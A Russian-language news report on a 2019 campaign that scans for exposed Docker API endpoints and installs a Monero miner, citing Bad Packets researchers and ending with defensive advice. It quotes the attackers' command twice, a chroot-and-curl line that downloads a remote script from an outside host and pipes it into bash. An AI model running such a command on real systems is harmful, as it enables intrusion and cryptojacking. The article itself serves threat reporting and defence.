Хакеры запустили масштабную кампанию по поиску уязвимых Docker-контейнеров с для последующей установки на них майнера криптовалюты Monero.
Группа хакеров запустила масштабную кампанию по поиску Docker-контейнеров с открытыми конечными точками API для последующей установки на них майнера криптовалюты Monero (XMR). Проблема была обнаружена специалистами по кибербезопасности из компании Bad Packets LLC.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
«Command»: «chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;’»,#threatintel pic.twitter.com/vxszV5SF1o— Bad Packets Report (@bad_packets) November 25, 2019
Docker представляет собой систему развертывания приложений, с поддержкой контейнеризации. Приложение со всем окружением можно упаковать в контейнер, которым легко и просто управлять: переносить на другой сервер, масштабировать или обновлять.
В настоящее время хакеры просканировали более 59 000 IP-сетей. После обнаружения уязвимого хоста злоумышленники используют конечную точку API для запуска контейнера ОС Alpine Linux и загрузки скрипта Bash:
chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;
Этот скрипт устанавливает классический майнер криптовалюты XMRRig. За два дня хакеры добыли 14,82 XMR (около $815 на момент публикации).
Специалисты Bad Packets LLC рекомендуют пользователям Docker проверять, выставляют ли они свои конечные точки API в интернете, закрывать порты и завершать работу нераспознанных запущенных контейнеров.
Напомним, в октябре через образы контейнеров Docker из открытого депозитария Docker Hub распространялся червь, заразивший 2000 машин программой для скрытого майнинга Monero.